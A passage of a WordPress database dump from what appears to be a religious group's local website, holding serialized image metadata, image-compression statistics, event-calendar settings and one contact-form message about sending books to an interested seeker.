409;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(130883,263649,'original-file','2021/01/seeker-in-the-light-1-updraft-pre-smush-original.jpg'),(130884,263649,'smush-complete','1'),(130885,263649,'smush-info','The file was compressed from 42.83 KB to 29.59 KB saving 30.92 percent using WP-Optimize'),(130886,263649,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:43858;s:12:\"smushed-size\";i:30298;s:15:\"savings-percent\";d:30.9200000000000017053025658242404460906982421875;}'),(130887,263644,'original-file','2021/01/3-young-people-smiling-updraft-pre-smush-original.jpg'),(130888,263644,'smush-complete','1'),(130889,263644,'smush-info','The file was compressed from 39.90 KB to 37.74 KB saving 5.4 percent using WP-Optimize'),(130890,263644,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:40855;s:12:\"smushed-size\";i:38648;s:15:\"savings-percent\";d:5.4000000000000003552713678800500929355621337890625;}'),(145123,265425,'mec_repeat_type',''),(145124,265425,'mec_repeat_interval','1'),(145125,265425,'mec_repeat_end',''),(145126,265425,'mec_repeat_end_at_occurrences',''),(145127,265425,'mec_repeat_end_at_date',''),(145128,265425,'mec_advanced_days','a:0:{}'),(145065,265363,'_wp_attached_file','2021/08/elss-child-flowers-2.jpg'),(145118,265425,'mec_allday','0'),(145119,265425,'mec_hide_time','0'),(145120,265425,'mec_hide_end_time','0'),(145121,265425,'mec_comment',''),(145122,265425,'mec_repeat_status','0'),(145117,265425,'mec_certain_weekdays','a:0:{}'),(145116,265425,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(145052,265361,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:386046;s:12:\"smushed-size\";i:376505;s:15:\"savings-percent\";d:2.470000000000000195399252334027551114559173583984375;}'),(145051,265361,'smush-info','The file was compressed from 377.00 KB to 367.68 KB saving 2.47 percent using WP-Optimize'),(145050,265361,'smush-complete','1'),(145049,265361,'original-file','2021/08/elss-bkgnd-2-updraft-pre-smush-original.jpg'),(145046,265361,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1200;s:4:\"file\";s:24:\"2021/08/elss-bkgnd-2.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"elss-bkgnd-2-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"elss-bkgnd-2-1024x640.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"elss-bkgnd-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"elss-bkgnd-2-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"elss-bkgnd-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"elss-bkgnd-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"elss-bkgnd-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"elss-bkgnd-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:25:\"elss-bkgnd-2-1536x960.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"elss-bkgnd-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145045,265361,'_wp_attached_file','2021/08/elss-bkgnd-2.jpg'),(146474,265591,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-09-20\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-09-20\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(146472,265591,'boldgrid_hide_page_title','0'),(146473,265591,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(145115,265425,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-06\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-06\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(145073,265363,'smush-info','The file was compressed from 39.16 KB to 37.12 KB saving 5.21 percent using WP-Optimize'),(145074,265363,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:40103;s:12:\"smushed-size\";i:38014;s:15:\"savings-percent\";d:5.20999999999999996447286321199499070644378662109375;}'),(193698,269204,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom'),(193697,269204,'_field_651','(801) 539-1228'),(145077,265364,'_wp_attached_file','2021/08/elss-boat-1.jpg'),(145078,265364,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:410;s:6:\"height\";i:272;s:4:\"file\";s:23:\"2021/08/elss-boat-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"elss-boat-1-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"elss-boat-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:23:\"elss-boat-1-300x272.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:23:\"elss-boat-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:23:\"elss-boat-1-300x272.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"elss-boat-1-410x250.jpg\";s:5:\"width\";i:410;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(132418,262520,'_EventOrigin','events-calendar'),(132419,262520,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";i:1613730641;s:24:\"boldgrid_hide_page_title\";i:1613730641;s:16:\"_EventRecurrence\";i:1613730641;s:17:\"_EventShowMapLink\";i:1613730641;s:13:\"_EventShowMap\";i:1613730641;s:20:\"_EventCurrencySymbol\";i:1613730641;s:22:\"_EventCurrencyPosition\";i:1613730641;s:10:\"_EventCost\";i:1613730641;s:9:\"_EventURL\";i:1613730641;s:14:\"_EventTimezone\";i:1613730641;s:16:\"protect_children\";i:1613730641;s:27:\"_EventNextPendingRecurrence\";i:1613730641;s:26:\"_RTECregistrationsDisabled\";i:1613730641;s:17:\"_RTECdeadlineType\";i:1613730641;s:19:\"_RTECwhoCanRegister\";i:1613730641;s:23:\"_RTEClimitRegistrations\";i:1613730641;s:21:\"_RTECmaxRegistrations\";i:1613730641;s:13:\"_EventVenueID\";i:1613730641;s:13:\"_thumbnail_id\";i:1613730641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1613730641;s:16:\"tribe_events_cat\";i:1613755841;}'),(132417,262520,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";i:1613730641;s:24:\"boldgrid_hide_page_title\";i:1613730641;s:16:\"_EventRecurrence\";i:1613730641;s:17:\"_EventShowMapLink\";i:1613730641;s:13:\"_EventShowMap\";i:1613730641;s:20:\"_EventCurrencySymbol\";i:1613730641;s:22:\"_EventCurrencyPosition\";i:1613730641;s:10:\"_EventCost\";i:1613730641;s:9:\"_EventURL\";i:1613730641;s:14:\"_EventTimezone\";i:1613730641;s:16:\"protect_children\";i:1613730641;s:27:\"_EventNextPendingRecurrence\";i:1613730641;s:26:\"_RTECregistrationsDisabled\";i:1613730641;s:17:\"_RTECdeadlineType\";i:1613730641;s:19:\"_RTECwhoCanRegister\";i:1613730641;s:23:\"_RTEClimitRegistrations\";i:1613730641;s:21:\"_RTECmaxRegistrations\";i:1613730641;s:13:\"_EventVenueID\";i:1613730641;s:13:\"_thumbnail_id\";i:1613730641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1613730641;s:16:\"tribe_events_cat\";i:1613755841;}'),(132453,262521,'_RTECregistrationsDisabled','1'),(132454,262521,'_RTECdeadlineType','start'),(132455,262521,'_RTECwhoCanRegister','any'),(132456,262521,'_RTEClimitRegistrations','0'),(132457,262521,'_RTECmaxRegistrations','30'),(132458,262521,'_EventVenueID','262517'),(151705,266076,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:719;s:6:\"height\";i:385;s:4:\"file\";s:29:\"2021/12/generic-event-6-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"generic-event-6-1-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"generic-event-6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:29:\"generic-event-6-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:29:\"generic-event-6-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:29:\"generic-event-6-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:29:\"generic-event-6-1-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"generic-event-6-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(132460,262521,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:4:{i:262518;a:2:{s:9:\"timestamp\";i:1610883000;s:8:\"duration\";i:5400;}i:262519;a:2:{s:9:\"timestamp\";i:1613907000;s:8:\"duration\";i:5400;}i:262520;a:2:{s:9:\"timestamp\";i:1616326200;s:8:\"duration\";i:5400;}i:262521;a:2:{s:9:\"timestamp\";i:1618745400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:6:{i:262522;a:2:{s:9:\"timestamp\";i:1621164600;s:8:\"duration\";i:5400;}i:262523;a:2:{s:9:\"timestamp\";i:1624188600;s:8:\"duration\";i:5400;}i:262524;a:2:{s:9:\"timestamp\";i:1626607800;s:8:\"duration\";i:5400;}i:262525;a:2:{s:9:\"timestamp\";i:1629027000;s:8:\"duration\";i:5400;}i:262526;a:2:{s:9:\"timestamp\";i:1632051000;s:8:\"duration\";i:5400;}i:262527;a:2:{s:9:\"timestamp\";i:1634470200;s:8:\"duration\";i:5400;}}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(132474,263833,'_field_71','Other'),(132475,263833,'_field_74','ECK Temple Vahana Leader'),(132476,263833,'_field_75','Hello,\nMy name is Chris and I am  the Local Director for Southwest Florida (Fort Myers area).  Recently a seeker who lives in Aurora phoned me asking for ECK material. I\'m not sure how she got connected with Florida but of course in ECK there are no accidents:)        I will mail her some ECK Wisdom books on Tuesday when I have a day off. I would also like to include the name and phone number of a local contact, perhaps one of your Vahana team members. She has a smart phone but may need some instruction on how to use it to attend online events. I believe she would be interested in attending events when you re-open as well. Could someone give me a call, text or email?  Thank you. '),(131913,263791,'_RTECnumRegistered','0'),(132394,262518,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:4:{i:262518;a:2:{s:9:\"timestamp\";i:1610883000;s:8:\"duration\";i:5400;}i:262519;a:2:{s:9:\"timestamp\";i:1613907000;s:8:\"duration\";i:5400;}i:262520;a:2:{s:9:\"timestamp\";i:1616326200;s:8:\"duration\";i:5400;}i:262521;a:2:{s:9:\"timestamp\";i:1618745400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:6:{i:262522;a:2:{s:9:\"timestamp\";i:1621164600;s:8:\"duration\";i:5400;}i:262523;a:2:{s:9:\"timestamp\";i:1624188600;s:8:\"duration\";i:5400;}i:262524;a:2:{s:9:\"timestamp\";i:1626607800;s:8:\"duration\";i:5400;}i:262525;a:2:{s:9:\"timestamp\";i:1629027000;s:8:\"duration\";i:5400;}i:262526;a:2:{s:9:\"timestamp\";i:1632051000;s:8:\"duration\";i:5400;}i:262527;a:2:{s:9:\"timestamp\";i:1634470200;s:8:\"duration\";i:5400;}}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(131880,263791,'_EventOrigin','events-calendar'),(131905,263791,'_EventTimezoneAbbr','MST'),(131470,263707,'protect_children',''),(131471,263707,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1612210013;s:12:\"_EventOrigin\";i:1612210013;s:13:\"_thumbnail_id\";i:1612210765;s:26:\"_RTECregistrationsDisabled\";i:1612210013;s:17:\"_RTECdeadlineType\";i:1612210013;s:19:\"_RTECwhoCanRegister\";i:1612210013;s:23:\"_RTEClimitRegistrations\";i:1612210013;s:21:\"_RTECmaxRegistrations\";i:1612210013;s:24:\"boldgrid_hide_page_title\";i:1612210013;s:16:\"_EventRecurrence\";i:1612210013;s:17:\"_EventShowMapLink\";i:1612210013;s:13:\"_EventShowMap\";i:1612210013;s:13:\"_EventVenueID\";i:1612210765;s:15:\"_EventStartDate\";i:1612210013;s:13:\"_EventEndDate\";i:1612210013;s:18:\"_EventStartDateUTC\";i:1612210013;s:16:\"_EventEndDateUTC\";i:1612210013;s:14:\"_EventDuration\";i:1612210013;s:20:\"_EventCurrencySymbol\";i:1612210013;s:22:\"_EventCurrencyPosition\";i:1612210013;s:10:\"_EventCost\";i:1612210013;s:9:\"_EventURL\";i:1612210013;s:14:\"_EventTimezone\";i:1612210013;s:18:\"_EventTimezoneAbbr\";i:1612210013;s:12:\"_dp_original\";i:1612210013;s:10:\"_edit_last\";i:1612210205;s:10:\"post_title\";i:1618149373;s:12:\"post_content\";i:1612210765;s:11:\"post_status\";i:1612210765;s:15:\"mec_location_id\";i:1618149372;s:27:\"mec_additional_location_ids\";i:1618149373;s:16:\"mec_organizer_id\";i:1618149373;s:28:\"mec_additional_organizer_ids\";i:1618149373;}'),(131472,263707,'_EventOrigin','events-calendar'),(131473,263707,'protect_children',''),(131474,263707,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1612210013;s:12:\"_EventOrigin\";i:1612210013;s:13:\"_thumbnail_id\";i:1612210765;s:26:\"_RTECregistrationsDisabled\";i:1612210013;s:17:\"_RTECdeadlineType\";i:1612210013;s:19:\"_RTECwhoCanRegister\";i:1612210013;s:23:\"_RTEClimitRegistrations\";i:1612210013;s:21:\"_RTECmaxRegistrations\";i:1612210013;s:24:\"boldgrid_hide_page_title\";i:1612210013;s:16:\"_EventRecurrence\";i:1612210013;s:17:\"_EventShowMapLink\";i:1612210013;s:13:\"_EventShowMap\";i:1612210013;s:13:\"_EventVenueID\";i:1612210765;s:15:\"_EventStartDate\";i:1612210013;s:13:\"_EventEndDate\";i:1612210013;s:18:\"_EventStartDateUTC\";i:1612210013;s:16:\"_EventEndDateUTC\";i:1612210013;s:14:\"_EventDuration\";i:1612210013;s:20:\"_EventCurrencySymbol\";i:1612210013;s:22:\"_EventCurrencyPosition\";i:1612210013;s:10:\"_EventCost\";i:1612210013;s:9:\"_EventURL\";i:1612210013;s:14:\"_EventTimezone\";i:1612210013;s:18:\"_EventTimezoneAbbr\";i:1612210013;s:12:\"_dp_original\";i:1612210013;s:10:\"_edit_last\";i:1612210205;s:10:\"post_title\";i:1618149373;s:12:\"post_content\";i:1612210765;s:11:\"post_status\";i:1612210765;s:15:\"mec_location_id\";i:1618149372;s:27:\"mec_additional_location_ids\";i:1618149373;s:16:\"mec_organizer_id\";i:1618149373;s:28:\"mec_additional_organizer_ids\";i:1618149373;}'),(131477,263707,'_RTECregistrationsDisabled','1'),(131478,263707,'_RTECdeadlineType','start'),(131479,263707,'_RTECwhoCanRegister','any'),(131480,263707,'_RTEClimitRegistrations','0'),(131481,263707,'_RTECmaxRegistrations','30'),(131475,263707,'_EventOrigin','events-calendar'),(131482,263707,'boldgrid_hide_page_title','0'),(131483,263707,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(131484,263707,'_EventShowMapLink','1'),(131485,263707,'_EventShowMap','1'),(131534,263707,'_EventVenueID','263708'),(131487,263707,'_EventStartDate','2021-01-14 08:00:00'),(131488,263707,'_EventEndDate','2021-01-14 17:00:00'),(131489,263707,'_EventStartDateUTC','2021-01-14 15:00:00'),(131490,263707,'_EventEndDateUTC','2021-01-15 00:00:00'),(131491,263707,'_EventDuration','32400'),(131492,263707,'_EventCurrencySymbol',''),(131493,263707,'_EventCurrencyPosition','prefix'),(131494,263707,'_EventCost',''),(131495,263707,'_EventURL',''),(131496,263707,'_EventTimezone','America/Denver'),(131497,263707,'_EventTimezoneAbbr','MST'),(131498,263707,'_dp_original','263319'),(131499,263707,'_edit_lock','1620657164:2'),(131500,263708,'protect_children',''),(131501,263708,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1612210067;s:12:\"_VenueOrigin\";i:1612210067;s:10:\"_edit_last\";i:1612210102;s:10:\"post_title\";i:1612210102;s:11:\"post_status\";i:1612210102;s:17:\"_EventShowMapLink\";i:1612210102;s:13:\"_EventShowMap\";i:1612210102;s:17:\"_VenueShowMapLink\";i:1612210102;s:13:\"_VenueShowMap\";i:1612210102;s:13:\"_VenueAddress\";i:1612210102;s:10:\"_VenueCity\";i:1612210102;s:13:\"_VenueCountry\";i:1612210102;s:14:\"_VenueProvince\";i:1612210102;s:11:\"_VenueState\";i:1612210102;s:9:\"_VenueZip\";i:1612210102;s:11:\"_VenuePhone\";i:1612210102;s:9:\"_VenueURL\";i:1612210102;s:19:\"_VenueStateProvince\";i:1612210102;s:21:\"_VenueOverwriteCoords\";i:1612210102;s:24:\"boldgrid_hide_page_title\";i:1612210102;}'),(131502,263708,'_VenueOrigin','events-calendar'),(131503,263708,'_edit_lock','1616607171:2'),(131504,263708,'_edit_last','2'),(131505,263708,'_EventShowMapLink','1'),(131506,263708,'_EventShowMap','1'),(131507,263708,'_VenueShowMapLink','1'),(131508,263708,'_VenueShowMap','1'),(131509,263708,'_VenueAddress',''),(131510,263708,'_VenueCity',''),(131511,263708,'_VenueCountry',''),(131512,263708,'_VenueProvince',''),(131513,263708,'_VenueState',''),(131514,263708,'_VenueZip',''),(131515,263708,'_VenuePhone',''),(131516,263708,'_VenueURL',''),(131517,263708,'_VenueStateProvince',''),(131518,263708,'_VenueOverwriteCoords','0'),(131519,263708,'boldgrid_hide_page_title','0'),(131520,263707,'_edit_last','2'),(131535,263710,'protect_children',''),(131536,263710,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1612210787;s:12:\"_EventOrigin\";i:1612210787;s:13:\"_thumbnail_id\";i:1615302150;s:26:\"_RTECregistrationsDisabled\";i:1612210787;s:17:\"_RTECdeadlineType\";i:1612210787;s:19:\"_RTECwhoCanRegister\";i:1612210787;s:23:\"_RTEClimitRegistrations\";i:1612210788;s:21:\"_RTECmaxRegistrations\";i:1612210788;s:24:\"boldgrid_hide_page_title\";i:1612210788;s:16:\"_EventRecurrence\";i:1612210788;s:17:\"_EventShowMapLink\";i:1612210788;s:13:\"_EventShowMap\";i:1612210788;s:15:\"_EventStartDate\";i:1612210858;s:13:\"_EventEndDate\";i:1612210858;s:18:\"_EventStartDateUTC\";i:1612210858;s:16:\"_EventEndDateUTC\";i:1612210858;s:14:\"_EventDuration\";i:1612210858;s:20:\"_EventCurrencySymbol\";i:1612210788;s:22:\"_EventCurrencyPosition\";i:1612210788;s:10:\"_EventCost\";i:1612210788;s:9:\"_EventURL\";i:1612210788;s:14:\"_EventTimezone\";i:1612210788;s:18:\"_EventTimezoneAbbr\";i:1612210788;s:12:\"_dp_original\";i:1612210788;s:13:\"_EventVenueID\";i:1612210788;s:10:\"_edit_last\";i:1612210858;s:16:\"tribe_events_cat\";i:1615327350;s:12:\"post_content\";i:1612284457;s:11:\"post_status\";i:1612210858;s:10:\"post_title\";i:1612284499;}'),(131537,263710,'_EventOrigin','events-calendar'),(131538,263710,'protect_children',''),(131539,263710,'protect_children',''),(131540,263710,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1612210787;s:12:\"_EventOrigin\";i:1612210787;s:13:\"_thumbnail_id\";i:1615302150;s:26:\"_RTECregistrationsDisabled\";i:1612210787;s:17:\"_RTECdeadlineType\";i:1612210787;s:19:\"_RTECwhoCanRegister\";i:1612210787;s:23:\"_RTEClimitRegistrations\";i:1612210788;s:21:\"_RTECmaxRegistrations\";i:1612210788;s:24:\"boldgrid_hide_page_title\";i:1612210788;s:16:\"_EventRecurrence\";i:1612210788;s:17:\"_EventShowMapLink\";i:1612210788;s:13:\"_EventShowMap\";i:1612210788;s:15:\"_EventStartDate\";i:1612210858;s:13:\"_EventEndDate\";i:1612210858;s:18:\"_EventStartDateUTC\";i:1612210858;s:16:\"_EventEndDateUTC\";i:1612210858;s:14:\"_EventDuration\";i:1612210858;s:20:\"_EventCurrencySymbol\";i:1612210788;s:22:\"_EventCurrencyPosition\";i:1612210788;s:10:\"_EventCost\";i:1612210788;s:9:\"_EventURL\";i:1612210788;s:14:\"_EventTimezone\";i:1612210788;s:18:\"_EventTimezoneAbbr\";i:1612210788;s:12:\"_dp_original\";i:1612210788;s:13:\"_EventVenueID\";i:1612210788;s:10:\"_edit_last\";i:1612210858;s:16:\"tribe_events_cat\";i:1615327350;s:12:\"post_content\";i:1612284457;s:11:\"post_status\";i:1612210858;s:10:\"post_title\";i:1612284499;}'),(131545,263710,'_RTECregistrationsDisabled','1'),(131549,263710,'_RTECmaxRegistrations','30'),(131550,263710,'boldgrid_hide_page_title','0'),(131551,263710,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(131552,263710,'_EventShowMapLink','1'),(131541,263710,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1612210787;s:12:\"_EventOrigin\";i:1612210787;s:13:\"_thumbnail_id\";i:1615302150;s:26:\"_RTECregistrationsDisabled\";i:1612210787;s:17:\"_RTECdeadlineType\";i:1612210787;s:19:\"_RTECwhoCanRegister\";i:1612210787;s:23:\"_RTEClimitRegistrations\";i:1612210788;s:21:\"_RTECmaxRegistrations\";i:1612210788;s:24:\"boldgrid_hide_page_title\";i:1612210788;s:16:\"_EventRecurrence\";i:1612210788;s:17:\"_EventShowMapLink\";i:1612210788;s:13:\"_EventShowMap\";i:1612210788;s:15:\"_EventStartDate\";i:1612210858;s:13:\"_EventEndDate\";i:1612210858;s:18:\"_EventStartDateUTC\";i:1612210858;s:16:\"_EventEndDateUTC\";i:1612210858;s:14:\"_EventDuration\";i:1612210858;s:20:\"_EventCurrencySymbol\";i:1612210788;s:22:\"_EventCurrencyPosition\";i:1612210788;s:10:\"_EventCost\";i:1612210788;s:9:\"_EventURL\";i:1612210788;s:14:\"_EventTimezone\";i:1612210788;s:18:\"_EventTimezoneAbbr\";i:1612210788;s:12:\"_dp_original\";i:1612210788;s:13:\"_EventVenueID\";i:1612210788;s:10:\"_edit_last\";i:1612210858;s:16:\"tribe_events_cat\";i:1615327350;s:12:\"post_content\";i:1612284457;s:11:\"post_status\";i:1612210858;s:10:\"post_title\";i:1612284499;}'),(131543,263710,'_EventOrigin','events-calendar'),(151733,266078,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-20\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-20\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(131546,263710,'_RTECdeadlineType','start'),(131547,263710,'_RTECwhoCanRegister','any'),(131548,263710,'_RTEClimitRegistrations','0'),(131542,263710,'_EventOrigin','events-calendar'),(131553,263710,'_EventShowMap','1'),(131554,263710,'_EventStartDate','2021-02-14 10:30:00'),(131555,263710,'_EventEndDate','2021-02-14 11:30:00'),(131556,263710,'_EventStartDateUTC','2021-02-14 17:30:00'),(131557,263710,'_EventEndDateUTC','2021-02-14 